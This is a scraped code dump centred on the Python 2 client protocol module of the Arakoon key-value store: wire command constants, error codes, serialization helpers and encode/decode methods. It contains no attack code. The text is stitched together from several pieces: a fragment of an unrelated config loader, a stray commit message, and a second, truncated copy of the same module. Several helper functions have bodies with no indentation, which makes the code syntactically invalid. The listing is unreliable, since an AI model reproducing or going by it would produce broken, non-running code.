                configFound = candidate
                break
        if not os.path.exists(configFound):
            log.error("Kahuna config file not found.")
            raise IOError("Configuration file not found. " +
                    "Please, make sure that $HOME/.kahuna.conf or /etc/kahuna.conf exists")
        # Bug fix: read the file that was actually located. The previous code
        # passed the loop variable, which after an unsuccessful search pointed
        # at the last candidate instead of the fallback path.
        config.read(configFound)
        self.address = config.get("connection", "address")
        self.user = config.get("connection", "user")
        self.password = config.get("connection", "pass")
|
"""
This file is part of Arakoon, a distributed key-value store. Copyright
(C) 2010 Incubaid BVBA
Licensees holding a valid Incubaid license may use this file in
accordance with Incubaid's Arakoon commercial license agreement. For
more information on how to enter into this agreement, please contact
Incubaid (contact details can be found on www.arakoon.org/licensing).
Alternatively, this file may be redistributed and/or modified under
the terms of the GNU Affero General Public License version 3, as
published by the Free Software Foundation. Under this license, this
file is distributed in the hope that it will be useful, but WITHOUT
ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
FITNESS FOR A PARTICULAR PURPOSE.
See the GNU Affero General Public License for more details.
You should have received a copy of the
GNU Affero General Public License along with this program (file "COPYING").
If not, see <http://www.gnu.org/licenses/>.
"""
"""
Module implementing the Arakoon protocol
"""
from ArakoonExceptions import *
from ArakoonValidators import SignatureValidator
from NurseryRouting import RoutingInfo
import struct
import logging
import select
import cStringIO
import types
# Translation table for dump(): printable characters (whose repr is exactly
# three characters, i.e. 'c') map to themselves, everything else to '.'.
FILTER = ''.join([(len(repr(chr(x)))==3) and chr(x) or '.' for x in range(256)])
# Client tuning knobs (times in seconds).
ARA_CFG_TRY_CNT = 1
ARA_CFG_CONN_TIMEOUT = 60
ARA_CFG_CONN_BACKOFF = 5
ARA_CFG_NO_MASTER_RETRY = 60
class ArakoonClientConfig :
    """Client-side view of an Arakoon cluster: the cluster id plus the
    location ( [ip], port ) of every node, with accessors for the
    module-level retry/timeout tuning knobs."""
    def __init__ (self, clusterId, nodes):
        """
        Constructor of an ArakoonClientConfig object
        The constructor takes one optional parameter 'nodes'.
        This is a dictionary containing info on the arakoon server nodes. It contains:
        - nodeids as keys
        - ([ip], port) as values
        e.g. ::
            cfg = ArakoonClientConfig ('ricky',
                { "myFirstNode" : (["127.0.0.1"], 4000 ),
                "mySecondNode" :(["127.0.0.1"], 5000 ),
                "myThirdNode" :(["127.0.0.1","10.0.0.1"], 6000 )] })
        @type clusterId: string
        @param clusterId: name of the cluster
        @type nodes: dict
        @param nodes: A dictionary containing the locations for the server nodes
        """
        self._clusterId = clusterId
        self._nodes = self._cleanUp(nodes)
    def _cleanUp(self, nodes):
        # Normalize node locations in place: accept a single comma-separated
        # string of ips and rewrite it to the canonical ([ip, ...], port) form.
        for k in nodes.keys():
            t = nodes[k]
            maybe_string = t[0]
            if type(maybe_string) == types.StringType:
                ip_list = maybe_string.split(',')
                port = t[1]
                nodes[k] = (ip_list, port)
        return nodes
    def __str__(self):
        r = "ArakoonClientConfig(%s,%s)" % (self._clusterId,
            str(self._nodes))
        return r
    @staticmethod
    def getNoMasterRetryPeriod() :
        """
        Retrieve the period messages to the master should be retried when a master re-election occurs
        This period is specified in seconds
        @rtype: integer
        @return: Returns the retry period in seconds
        """
        return ARA_CFG_NO_MASTER_RETRY
    def getNodeLocations(self, nodeId):
        """
        Retrieve location of the server node with give node identifier
        A location is a pair consisting of a hostname or ip address as first element.
        The second element of the pair is the tcp port
        @type nodeId: string
        @param nodeId: The node identifier whose location you are interested in
        @rtype: pair(string,int)
        @return: Returns a pair with the nodes hostname or ip and the tcp port, e.g. ("127.0.0.1", 4000)
        """
        return self._nodes[ nodeId ]
    def getTryCount (self):
        """
        Retrieve the number of attempts a message should be tried before giving up
        Can be controlled by changing the global variable L{ARA_CFG_TRY_CNT}
        @rtype: integer
        @return: Returns the max retry count.
        """
        return ARA_CFG_TRY_CNT
    def getNodes(self):
        """
        Retrieve the dictionary with node locations
        @rtype: dict
        @return: Returns a dictionary mapping the node identifiers (string) to its location ( pair<string,integer> )
        """
        return self._nodes
    @staticmethod
    def getConnectionTimeout():
        """
        Retrieve the tcp connection timeout
        Can be controlled by changing the global variable L{ARA_CFG_CONN_TIMEOUT}
        @rtype: integer
        @return: Returns the tcp connection timeout
        """
        return ARA_CFG_CONN_TIMEOUT
    @staticmethod
    def getBackoffInterval():
        """
        Retrieves the backoff interval.
        If an attempt to send a message to the server fails,
        the client will wait a random number of seconds. The maximum wait time is n*getBackoffInterVal()
        with n being the attempt counter.
        Can be controlled by changing the global variable L{ARA_CFG_CONN_BACKOFF}
        @rtype: integer
        @return: The maximum backoff interval
        """
        return ARA_CFG_CONN_BACKOFF
    def getClusterId(self):
        # Name of the cluster this configuration belongs to.
        return self._clusterId
class ArakoonClientLogger :
    """Thin facade over the stdlib logging module used by the client."""
    @staticmethod
    def logWarning(msg, *args):
        logging.warning(msg, *args)
    @staticmethod
    def logError(msg, *args):
        logging.error(msg, *args)
    @staticmethod
    def logCritical(msg, *args):
        logging.critical(msg, *args)
    @staticmethod
    def logDebug(msg, *args):
        logging.debug(msg, *args)
def dump(src, length=8):
    """Return a classic hex/ASCII dump of *src*, *length* bytes per row."""
    offset = 0
    out = ''
    while src:
        row, src = src[:length], src[length:]
        hexpart = ' '.join(["%02X" % ord(c) for c in row])
        printable = row.translate(FILTER)
        out += "%04X   %-*s   %s\n" % (offset, length*3, hexpart, printable)
        offset += length
    return out
# Sizes (in bytes) of the primitive wire types
ARA_TYPE_INT64_SIZE = 8
ARA_TYPE_INT_SIZE = 4
ARA_TYPE_BOOL_SIZE = 1
# Magic used to mask each command
ARA_CMD_MAG = 0xb1ff0000
# Protocol version sent in the prologue
ARA_CMD_VER = 0x00000001
# Hello command
ARA_CMD_HEL = 0x00000001 | ARA_CMD_MAG
# Who is master?
ARA_CMD_WHO = 0x00000002 | ARA_CMD_MAG
# Existence of a value for a key
ARA_CMD_EXISTS = 0x00000007 | ARA_CMD_MAG
# Get a value
ARA_CMD_GET = 0x00000008 | ARA_CMD_MAG
# Update a value
ARA_CMD_SET = 0x00000009 | ARA_CMD_MAG
# Assert that a key holds a given (optional) value
ARA_CMD_ASSERT = 0x00000016 | ARA_CMD_MAG
# Delete a key value pair
ARA_CMD_DEL = 0x0000000a | ARA_CMD_MAG
# Get a range of keys
ARA_CMD_RAN = 0x0000000b | ARA_CMD_MAG
# Get keys matching a prefix
ARA_CMD_PRE = 0x0000000c | ARA_CMD_MAG
# Test and set a value
ARA_CMD_TAS = 0x0000000d | ARA_CMD_MAG
# range entries
ARA_CMD_RAN_E = 0x0000000f | ARA_CMD_MAG
# sequence (atomic batch of updates)
ARA_CMD_SEQ = 0x00000010 | ARA_CMD_MAG
ARA_CMD_MULTI_GET = 0x00000011 | ARA_CMD_MAG
ARA_CMD_EXPECT_PROGRESS_POSSIBLE = 0x00000012 | ARA_CMD_MAG
ARA_CMD_STATISTICS = 0x00000013 | ARA_CMD_MAG
ARA_CMD_USER_FUNCTION = 0x00000015 | ARA_CMD_MAG
ARA_CMD_KEY_COUNT = 0x0000001a | ARA_CMD_MAG
ARA_CMD_CONFIRM = 0x0000001c | ARA_CMD_MAG
ARA_CMD_GET_NURSERY_CFG = 0x00000020 | ARA_CMD_MAG
ARA_CMD_REV_RAN_E = 0x00000023 | ARA_CMD_MAG
ARA_CMD_SYNCED_SEQUENCE = 0x00000024 | ARA_CMD_MAG
ARA_CMD_DELETE_PREFIX = 0x00000027 | ARA_CMD_MAG
ARA_CMD_VERSION = 0x00000028 | ARA_CMD_MAG
ARA_CMD_ASSERT_EXISTS = 0x00000029 | ARA_CMD_MAG
# Arakoon error codes
# Success
ARA_ERR_SUCCESS = 0
# No entity
ARA_ERR_NO_ENT = 1
# Node is not the master
ARA_ERR_NOT_MASTER = 4
# not found
ARA_ERR_NOT_FOUND = 5
# wrong cluster
ARA_ERR_WRONG_CLUSTER = 6
ARA_ERR_ASSERTION_FAILED = 7
ARA_ERR_RANGE_ERROR = 9
ARA_ERR_GOING_DOWN = 16
ARA_ERR_ASSERTEXISTS_FAILED = 17
# Type tags used by the named-field (statistics) encoding
NAMED_FIELD_TYPE_INT = 1
NAMED_FIELD_TYPE_INT64 = 2
NAMED_FIELD_TYPE_FLOAT = 3
NAMED_FIELD_TYPE_STRING = 4
NAMED_FIELD_TYPE_LIST = 5
def _packString( toPack ):
toPackLength = len( toPack )
return struct.pack("I%ds" % ( toPackLength), toPackLength, toPack )
def _packStringOption(toPack = None):
    """Serialize an optional string: a presence flag, then the string if set."""
    if toPack is None:
        return _packBool(0)
    return _packBool(1) + _packString(toPack)
def _packInt ( toPack ):
return struct.pack( "I", toPack )
def _packInt64 ( toPack ):
return struct.pack( "q", toPack )
def _packSignedInt ( toPack ):
return struct.pack( "i", toPack )
def _packBool ( toPack) :
return struct.pack( "?", toPack)
def sendPrologue(socket, clusterId):
    """Send the protocol prologue: magic, version, then the cluster id."""
    prologue = _packInt(ARA_CMD_MAG) + _packInt(ARA_CMD_VER) + _packString(clusterId)
    socket.sendall(prologue)
def _readExactNBytes( con, n ):
    """Read exactly *n* bytes from connection *con*.

    Blocks with the configured connection timeout; on timeout, peer close or
    receive error the socket is closed, con._connected is cleared, and the
    matching ArakoonSock* exception is raised.
    """
    if not con._connected :
        raise ArakoonSockRecvClosed()
    bytesRemaining = n
    tmpResult = ""
    timeout = ArakoonClientConfig.getConnectionTimeout()
    while bytesRemaining > 0 :
        # Wait until the socket is readable (or the timeout elapses).
        tripleList = select.select( [con._socket] , [] , [] , timeout )
        if ( len ( tripleList [0]) != 0 ) :
            newChunk = ""
            try :
                newChunk = tripleList [0][0].recv ( bytesRemaining)
            except Exception, ex:
                ArakoonClientLogger.logError ("Error while receiving from socket. %s: '%s'" % (ex.__class__.__name__, ex) )
                con._connected = False
                raise ArakoonSockRecvError()
            newChunkSize = len( newChunk )
            # recv() returning zero bytes means the peer closed the connection.
            if newChunkSize == 0 :
                try:
                    con._socket.close()
                except Exception, ex:
                    ArakoonClientLogger.logError( "Error while closing socket. %s: %s" % (ex.__class__.__name__,ex))
                con._connected = False
                raise ArakoonSockReadNoBytes ()
            tmpResult = tmpResult + newChunk
            bytesRemaining = bytesRemaining - newChunkSize
        else :
            # select() timed out: treat the connection as dead.
            try:
                con._socket.close()
            except Exception, ex:
                ArakoonClientLogger.logError( "Error while closing socket. %s: %s" % (ex.__class__.__name__,ex))
            con._connected = False
            raise ArakoonSockNotReadable()
    return tmpResult
def _recvString(con):
    """Read a length-prefixed string from the connection."""
    size = _recvInt(con)
    data = _readExactNBytes(con, size)
    return struct.unpack("%ds" % size, data)[0]
def _unpackInt(buf, offset):
    """Read an unsigned 32-bit int at *offset*; return (value, new offset)."""
    value = struct.unpack_from("I", buf, offset)[0]
    return value, offset + ARA_TYPE_INT_SIZE
def _unpackSignedInt(buf, offset):
    """Read a signed 32-bit int at *offset*; return (value, new offset)."""
    value = struct.unpack_from("i", buf, offset)[0]
    return value, offset + ARA_TYPE_INT_SIZE
def _unpackInt64(buf, offset):
r= struct.unpack_from("q", buf, offset)
return r[0], offset + 8
def _unpackString(buf, offset):
    """Read a length-prefixed string at *offset*; return (value, new offset)."""
    size, start = _unpackInt(buf, offset)
    end = start + size
    return buf[start:end], end
def _unpackStringList(buf, offset):
    """Read a counted list of length-prefixed strings; return (list, new offset)."""
    count, offset = _unpackInt(buf, offset)
    items = []
    for _ in range(count):
        item, offset = _unpackString(buf, offset)
        items.append(item)
    return items, offset
def _unpackNamedField(buf, offset):
    """Decode one (type tag, name, value) triple at *offset*.

    Returns ({name: value}, new offset).  LIST fields recurse and merge their
    children into a nested dict.  Raises ArakoonException on an unknown tag.
    """
    # NOTE: 'type' shadows the builtin of the same name inside this function.
    type, offset = _unpackInt(buf, offset)
    name, offset = _unpackString(buf, offset)
    result = dict()
    if type == NAMED_FIELD_TYPE_INT:
        result[name], offset = _unpackInt(buf,offset)
        return result, offset
    if type == NAMED_FIELD_TYPE_INT64:
        result[name], offset = _unpackInt64(buf,offset)
        return result, offset
    if type == NAMED_FIELD_TYPE_FLOAT:
        result[name], offset = _unpackFloat(buf,offset)
        return result, offset
    if type == NAMED_FIELD_TYPE_STRING:
        result[name], offset = _unpackString(buf,offset)
        return result, offset
    if type == NAMED_FIELD_TYPE_LIST:
        # Recursively decode 'length' child fields into a nested dict.
        length, offset = _unpackInt(buf,offset)
        localDict = dict()
        for i in range(length):
            field, offset = _unpackNamedField(buf, offset)
            localDict.update( field )
        result[name] = localDict
        return result, offset
    raise ArakoonException("Cannot decode named field %s. Invalid type: %d" % (name,type) )
def _recvInt(con):
    """Read a 4-byte unsigned int from the connection."""
    raw = _readExactNBytes(con, ARA_TYPE_INT_SIZE)
    value, _ = _unpackInt(raw, 0)
    return value
def _recvInt64(con):
    """Read an 8-byte signed int from the connection."""
    raw = _readExactNBytes(con, ARA_TYPE_INT64_SIZE)
    value, _ = _unpackInt64(raw, 0)
    return value
def _unpackBool(buf, offset):
r = struct.unpack_from( "?", buf, offset) [0]
return r, offset+1
def _recvBool(con):
    """Read a single boolean byte from the connection."""
    raw = _readExactNBytes(con, 1)
    value, _ = _unpackBool(raw, 0)
    return value
def _unpackFloat(buf, offset):
r = struct.unpack_from("d", buf, offset)
return r[0], offset+8
def _recvFloat(con):
    """Read an 8-byte double from the connection.

    Bug fix: the parameter was named 'buf' while the body read from an
    undefined global 'con', so every call raised NameError.  The parameter is
    now the connection, matching the other _recv* helpers.
    """
    buf = _readExactNBytes(con, 8)
    f, o2 = _unpackFloat(buf, 0)
    return f
def _recvStringOption(con):
    """Read an optional string: a presence flag, then the string if present."""
    if _recvBool(con):
        return _recvString(con)
    return None
class Update(object):
    # Marker base class for the elements of a Sequence; concrete subclasses
    # implement write(fob) to emit their wire representation.
    pass
class Set(Update):
    """Sequence element: store *value* under *key* (wire tag 1)."""
    def __init__(self, key, value):
        self._key = key
        self._value = value
    def write(self, fob):
        # Tag first, then the length-prefixed key and value.
        for chunk in (_packInt(1), _packString(self._key), _packString(self._value)):
            fob.write(chunk)
class Delete(Update):
    """Sequence element: remove *key* (wire tag 2)."""
    def __init__(self, key):
        self._key = key
    def write(self, fob):
        # Tag first, then the length-prefixed key.
        for chunk in (_packInt(2), _packString(self._key)):
            fob.write(chunk)
class Assert(Update):
    """Sequence element: assert *key* holds the optional value *vo* (wire tag 8)."""
    def __init__(self, key, vo):
        self._key = key
        self._vo = vo
    def write(self, fob):
        # Tag, key, then the optional expected value.
        for chunk in (_packInt(8), _packString(self._key), _packStringOption(self._vo)):
            fob.write(chunk)
class AssertExists(Update):
    """Sequence element: assert that *key* exists (wire tag 15)."""
    def __init__(self, key):
        self._key = key
    def write(self, fob):
        # Tag first, then the length-prefixed key.
        for chunk in (_packInt(15), _packString(self._key)):
            fob.write(chunk)
class Sequence(Update):
    """An ordered batch of updates, sent as one command (wire tag 5)."""
    def __init__(self):
        self._updates = []
    def addUpdate(self,u):
        # Append an arbitrary, pre-built Update.
        self._updates.append(u)
    @SignatureValidator( 'string', 'string' )
    def addSet(self, key,value):
        self._updates.append(Set(key,value))
    @SignatureValidator( 'string' )
    def addDelete(self, key):
        self._updates.append(Delete(key))
    def addAssert(self, key,vo):
        self._updates.append(Assert(key,vo))
    def addAssertExists(self, key):
        self._updates.append(AssertExists(key))
    def write(self, fob):
        # Tag 5, the number of updates, then each update's own encoding.
        fob.write( _packInt(5))
        fob.write( _packInt(len(self._updates)))
        for update in self._updates:
            update.write(fob)
class ArakoonProtocol :
    """Wire-format codec for the Arakoon client protocol.

    encode* methods build the byte string for a client command; decode*
    methods read a server reply from a connection and return the decoded
    value, raising the matching Arakoon exception on a non-zero error code.
    """
    @staticmethod
    def encodePing(clientId, clusterId ):
        r = _packInt(ARA_CMD_HEL)
        r += _packString(clientId)
        r += _packString(clusterId)
        return r
    @staticmethod
    def encodeGetVersion():
        r = _packInt(ARA_CMD_VERSION)
        return r
    @staticmethod
    def encodeWhoMaster():
        return _packInt( ARA_CMD_WHO )
    @staticmethod
    def encodeExists(key, allowDirty):
        msg = _packInt(ARA_CMD_EXISTS)
        msg += _packBool(allowDirty)
        msg += _packString(key)
        return msg
    @staticmethod
    def encodeAssert(key, vo, allowDirty):
        msg = _packInt(ARA_CMD_ASSERT)
        msg += _packBool(allowDirty)
        msg += _packString(key)
        msg += _packStringOption(vo)
        return msg
    @staticmethod
    def encodeAssertExists(key, allowDirty):
        # Bug fix: removed a stray debug print ("encodeAE") that polluted
        # stdout on every call.
        msg = _packInt(ARA_CMD_ASSERT_EXISTS)
        msg += _packBool(allowDirty)
        msg += _packString(key)
        return msg
    @staticmethod
    def encodeGet(key , allowDirty):
        msg = _packInt(ARA_CMD_GET)
        msg += _packBool(allowDirty)
        msg += _packString(key)
        return msg
    @staticmethod
    def encodeSet( key, value ):
        return _packInt( ARA_CMD_SET ) + _packString( key ) + _packString ( value )
    @staticmethod
    def encodeConfirm(key, value):
        return _packInt(ARA_CMD_CONFIRM) + _packString(key) + _packString(value)
    @staticmethod
    def encodeSequence(seq, sync):
        # Flatten the sequence into an in-memory buffer, then send it as one
        # length-prefixed string.
        r = cStringIO.StringIO()
        seq.write(r)
        flattened = r.getvalue()
        r.close()
        cmd = ARA_CMD_SEQ
        if sync:
            cmd = ARA_CMD_SYNCED_SEQUENCE
        return _packInt(cmd) + _packString(flattened)
    @staticmethod
    def encodeDelete( key ):
        return _packInt ( ARA_CMD_DEL ) + _packString ( key )
    @staticmethod
    def encodeRange( bKey, bInc, eKey, eInc, maxCnt , allowDirty):
        retVal = _packInt( ARA_CMD_RAN ) + _packBool(allowDirty)
        retVal += _packStringOption( bKey ) + _packBool ( bInc )
        retVal += _packStringOption( eKey ) + _packBool (eInc) + _packSignedInt (maxCnt)
        return retVal
    @staticmethod
    def encodeRangeEntries(first, finc, last, linc, maxEntries, allowDirty):
        r = _packInt(ARA_CMD_RAN_E) + _packBool(allowDirty)
        r += _packStringOption(first) + _packBool(finc)
        r += _packStringOption(last) + _packBool(linc)
        r += _packSignedInt(maxEntries)
        return r
    @staticmethod
    def encodeReverseRangeEntries(first, finc, last, linc, maxEntries, allowDirty):
        r = _packInt(ARA_CMD_REV_RAN_E) + _packBool(allowDirty)
        r += _packStringOption(first) + _packBool(finc)
        r += _packStringOption(last) + _packBool(linc)
        r += _packSignedInt(maxEntries)
        return r
    @staticmethod
    def encodePrefixKeys( key, maxCnt, allowDirty ):
        retVal = _packInt( ARA_CMD_PRE) + _packBool(allowDirty)
        retVal += _packString( key )
        retVal += _packSignedInt( maxCnt )
        return retVal
    @staticmethod
    def encodeTestAndSet( key, oldVal, newVal ):
        retVal = _packInt( ARA_CMD_TAS ) + _packString( key )
        retVal += _packStringOption( oldVal )
        retVal += _packStringOption( newVal )
        return retVal
    @staticmethod
    def encodeMultiGet(keys, allowDirty):
        retVal = _packInt(ARA_CMD_MULTI_GET) + _packBool(allowDirty)
        retVal += _packInt(len(keys))
        for key in keys:
            retVal += _packString(key)
        return retVal
    @staticmethod
    def encodeExpectProgressPossible():
        retVal = _packInt(ARA_CMD_EXPECT_PROGRESS_POSSIBLE)
        return retVal
    @staticmethod
    def encodeStatistics():
        retVal = _packInt(ARA_CMD_STATISTICS)
        return retVal
    @staticmethod
    def encodeUserFunction(name, argument):
        retVal = _packInt(ARA_CMD_USER_FUNCTION)
        retVal += _packString(name)
        retVal += _packStringOption(argument)
        return retVal
    @staticmethod
    def encodeDeletePrefix(prefix):
        retVal = _packInt(ARA_CMD_DELETE_PREFIX)
        retVal += _packString(prefix)
        return retVal
    @staticmethod
    def _evaluateErrorCode( con ):
        # Every reply starts with a status code; on failure the server also
        # sends an error message, which is mapped to the matching exception.
        errorCode = _recvInt ( con )
        if errorCode == ARA_ERR_SUCCESS :
            return
        else :
            errorMsg = _recvString ( con )
            if errorCode == ARA_ERR_NOT_FOUND:
                raise ArakoonNotFound(errorMsg)
            if errorCode == ARA_ERR_NOT_MASTER:
                raise ArakoonNodeNotMaster()
            if errorCode == ARA_ERR_ASSERTION_FAILED:
                raise ArakoonAssertionFailed(errorMsg)
            if errorCode == ARA_ERR_ASSERTEXISTS_FAILED:
                raise ArakoonAssertExistsFailed(errorMsg)
            if errorCode == ARA_ERR_RANGE_ERROR:
                raise NurseryRangeError(errorMsg)
            if errorCode == ARA_ERR_GOING_DOWN:
                raise ArakoonGoingDown(errorMsg)
            # Any other non-zero code falls through to the generic exception.
            if errorCode != ARA_ERR_SUCCESS:
                raise ArakoonException( "EC=%d. %s" % (errorCode, errorMsg) )
    @staticmethod
    def decodeInt64Result( con ) :
        ArakoonProtocol._evaluateErrorCode( con )
        return _recvInt64( con )
    @staticmethod
    def decodeIntResult(con):
        ArakoonProtocol._evaluateErrorCode(con)
        return _recvInt(con)
    @staticmethod
    def decodeVoidResult( con ):
        ArakoonProtocol._evaluateErrorCode( con )
    @staticmethod
    def decodeBoolResult( con ):
        ArakoonProtocol._evaluateErrorCode( con )
        return _recvBool( con )
    @staticmethod
    def decodeStringResult ( con ):
        ArakoonProtocol._evaluateErrorCode( con )
        return _recvString( con )
    @staticmethod
    def decodeStringOptionResult ( con ):
        ArakoonProtocol._evaluateErrorCode( con )
        return _recvStringOption( con )
    @staticmethod
    def decodeStringListResult( con ):
        # Note: items are prepended ([:0]), so the returned list is in
        # reverse arrival order -- preserved as-is for compatibility.
        ArakoonProtocol._evaluateErrorCode( con )
        retVal = []
        arraySize = _recvInt( con )
        for i in range( arraySize ) :
            retVal[:0] = [ _recvString( con ) ]
        return retVal
    @staticmethod
    def decodeNurseryCfgResult( con ):
        ArakoonProtocol._evaluateErrorCode(con)
        offset = 0
        encoded = _recvString( con )
        routing, offset = RoutingInfo.unpack(encoded, offset, _unpackBool, _unpackString)
        cfgCount, offset = _unpackInt(encoded, offset)
        resultCfgs = {}
        for i in range(cfgCount) :
            clusterId, offset = _unpackString(encoded, offset)
            clusterSize, offset = _unpackInt(encoded, offset)
            cfg = dict()
            for j in range(clusterSize):
                nodeId, offset = _unpackString(encoded, offset)
                ips, offset = _unpackStringList(encoded, offset)
                port, offset = _unpackInt(encoded, offset)
                cfg[nodeId] = (ips,port)
            cliCfg = ArakoonClientConfig(clusterId, cfg)
            resultCfgs[clusterId] = cliCfg
        return (routing, resultCfgs)
    @staticmethod
    def decodeStringPairListResult(con):
        # Note: pairs are prepended ([:0]), so the returned list is in
        # reverse arrival order -- preserved as-is for compatibility.
        ArakoonProtocol._evaluateErrorCode(con)
        result = []
        size = _recvInt( con )
        for i in range(size):
            k = _recvString ( con )
            v = _recvString ( con )
            result [:0] = [(k, v)]
        return result
    @staticmethod
    def decodeStatistics(con):
        ArakoonProtocol._evaluateErrorCode(con)
        buffer = _recvString(con)
        result, offset = _unpackNamedField(buffer,0)
        return result['arakoon_stats']
    @staticmethod
    def decodeVersionResult(con):
        ArakoonProtocol._evaluateErrorCode(con)
        major = _recvInt(con)
        minor = _recvInt(con)
        patch = _recvInt(con)
        info = _recvString(con)
        return (major,minor, patch, info)
    @staticmethod
    def encodeGetKeyCount () :
        return _packInt(ARA_CMD_KEY_COUNT)
    @staticmethod
    def encodeGetNurseryCfg ():
        return _packInt(ARA_CMD_GET_NURSERY_CFG)
python client: SocketNotReadable now has peername in message
"""
This file is part of Arakoon, a distributed key-value store. Copyright
(C) 2010 Incubaid BVBA
Licensees holding a valid Incubaid license may use this file in
accordance with Incubaid's Arakoon commercial license agreement. For
more information on how to enter into this agreement, please contact
Incubaid (contact details can be found on www.arakoon.org/licensing).
Alternatively, this file may be redistributed and/or modified under
the terms of the GNU Affero General Public License version 3, as
published by the Free Software Foundation. Under this license, this
file is distributed in the hope that it will be useful, but WITHOUT
ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
FITNESS FOR A PARTICULAR PURPOSE.
See the GNU Affero General Public License for more details.
You should have received a copy of the
GNU Affero General Public License along with this program (file "COPYING").
If not, see <http://www.gnu.org/licenses/>.
"""
"""
Module implementing the Arakoon protocol
"""
from ArakoonExceptions import *
from ArakoonValidators import SignatureValidator
from NurseryRouting import RoutingInfo
import struct
import logging
import select
import cStringIO
import types
# Translation table for dump(): printable characters (whose repr is exactly
# three characters, i.e. 'c') map to themselves, everything else to '.'.
FILTER = ''.join([(len(repr(chr(x)))==3) and chr(x) or '.' for x in range(256)])
# Client tuning knobs (times in seconds).
ARA_CFG_TRY_CNT = 1
ARA_CFG_CONN_TIMEOUT = 60
ARA_CFG_CONN_BACKOFF = 5
ARA_CFG_NO_MASTER_RETRY = 60
class ArakoonClientConfig :
    """Client-side view of an Arakoon cluster: the cluster id plus the
    location ( [ip], port ) of every node, with accessors for the
    module-level retry/timeout tuning knobs."""
    def __init__ (self, clusterId, nodes):
        """
        Constructor of an ArakoonClientConfig object
        The constructor takes one optional parameter 'nodes'.
        This is a dictionary containing info on the arakoon server nodes. It contains:
        - nodeids as keys
        - ([ip], port) as values
        e.g. ::
            cfg = ArakoonClientConfig ('ricky',
                { "myFirstNode" : (["127.0.0.1"], 4000 ),
                "mySecondNode" :(["127.0.0.1"], 5000 ),
                "myThirdNode" :(["127.0.0.1","10.0.0.1"], 6000 )] })
        @type clusterId: string
        @param clusterId: name of the cluster
        @type nodes: dict
        @param nodes: A dictionary containing the locations for the server nodes
        """
        self._clusterId = clusterId
        self._nodes = self._cleanUp(nodes)
    def _cleanUp(self, nodes):
        # Normalize node locations in place: accept a single comma-separated
        # string of ips and rewrite it to the canonical ([ip, ...], port) form.
        for k in nodes.keys():
            t = nodes[k]
            maybe_string = t[0]
            if type(maybe_string) == types.StringType:
                ip_list = maybe_string.split(',')
                port = t[1]
                nodes[k] = (ip_list, port)
        return nodes
    def __str__(self):
        r = "ArakoonClientConfig(%s,%s)" % (self._clusterId,
            str(self._nodes))
        return r
    @staticmethod
    def getNoMasterRetryPeriod() :
        """
        Retrieve the period messages to the master should be retried when a master re-election occurs
        This period is specified in seconds
        @rtype: integer
        @return: Returns the retry period in seconds
        """
        return ARA_CFG_NO_MASTER_RETRY
    def getNodeLocations(self, nodeId):
        """
        Retrieve location of the server node with give node identifier
        A location is a pair consisting of a hostname or ip address as first element.
        The second element of the pair is the tcp port
        @type nodeId: string
        @param nodeId: The node identifier whose location you are interested in
        @rtype: pair(string,int)
        @return: Returns a pair with the nodes hostname or ip and the tcp port, e.g. ("127.0.0.1", 4000)
        """
        return self._nodes[ nodeId ]
    def getTryCount (self):
        """
        Retrieve the number of attempts a message should be tried before giving up
        Can be controlled by changing the global variable L{ARA_CFG_TRY_CNT}
        @rtype: integer
        @return: Returns the max retry count.
        """
        return ARA_CFG_TRY_CNT
    def getNodes(self):
        """
        Retrieve the dictionary with node locations
        @rtype: dict
        @return: Returns a dictionary mapping the node identifiers (string) to its location ( pair<string,integer> )
        """
        return self._nodes
    @staticmethod
    def getConnectionTimeout():
        """
        Retrieve the tcp connection timeout
        Can be controlled by changing the global variable L{ARA_CFG_CONN_TIMEOUT}
        @rtype: integer
        @return: Returns the tcp connection timeout
        """
        return ARA_CFG_CONN_TIMEOUT
    @staticmethod
    def getBackoffInterval():
        """
        Retrieves the backoff interval.
        If an attempt to send a message to the server fails,
        the client will wait a random number of seconds. The maximum wait time is n*getBackoffInterVal()
        with n being the attempt counter.
        Can be controlled by changing the global variable L{ARA_CFG_CONN_BACKOFF}
        @rtype: integer
        @return: The maximum backoff interval
        """
        return ARA_CFG_CONN_BACKOFF
    def getClusterId(self):
        # Name of the cluster this configuration belongs to.
        return self._clusterId
class ArakoonClientLogger :
    """Thin facade over the stdlib logging module used by the client."""
    @staticmethod
    def logWarning(msg, *args):
        logging.warning(msg, *args)
    @staticmethod
    def logError(msg, *args):
        logging.error(msg, *args)
    @staticmethod
    def logCritical(msg, *args):
        logging.critical(msg, *args)
    @staticmethod
    def logDebug(msg, *args):
        logging.debug(msg, *args)
def dump(src, length=8):
    """Return a classic hex/ASCII dump of *src*, *length* bytes per row."""
    offset = 0
    out = ''
    while src:
        row, src = src[:length], src[length:]
        hexpart = ' '.join(["%02X" % ord(c) for c in row])
        printable = row.translate(FILTER)
        out += "%04X   %-*s   %s\n" % (offset, length*3, hexpart, printable)
        offset += length
    return out
# Sizes (in bytes) of the primitive wire types
ARA_TYPE_INT64_SIZE = 8
ARA_TYPE_INT_SIZE = 4
ARA_TYPE_BOOL_SIZE = 1
# Magic used to mask each command
ARA_CMD_MAG = 0xb1ff0000
# Protocol version sent in the prologue
ARA_CMD_VER = 0x00000001
# Hello command
ARA_CMD_HEL = 0x00000001 | ARA_CMD_MAG
# Who is master?
ARA_CMD_WHO = 0x00000002 | ARA_CMD_MAG
# Existence of a value for a key
ARA_CMD_EXISTS = 0x00000007 | ARA_CMD_MAG
# Get a value
ARA_CMD_GET = 0x00000008 | ARA_CMD_MAG
# Update a value
ARA_CMD_SET = 0x00000009 | ARA_CMD_MAG
# Assert that a key holds a given (optional) value
ARA_CMD_ASSERT = 0x00000016 | ARA_CMD_MAG
# Delete a key value pair
ARA_CMD_DEL = 0x0000000a | ARA_CMD_MAG
# Get a range of keys
ARA_CMD_RAN = 0x0000000b | ARA_CMD_MAG
# Get keys matching a prefix
ARA_CMD_PRE = 0x0000000c | ARA_CMD_MAG
# Test and set a value
ARA_CMD_TAS = 0x0000000d | ARA_CMD_MAG
# range entries
ARA_CMD_RAN_E = 0x0000000f | ARA_CMD_MAG
# sequence (atomic batch of updates)
ARA_CMD_SEQ = 0x00000010 | ARA_CMD_MAG
ARA_CMD_MULTI_GET = 0x00000011 | ARA_CMD_MAG
ARA_CMD_EXPECT_PROGRESS_POSSIBLE = 0x00000012 | ARA_CMD_MAG
ARA_CMD_STATISTICS = 0x00000013 | ARA_CMD_MAG
ARA_CMD_USER_FUNCTION = 0x00000015 | ARA_CMD_MAG
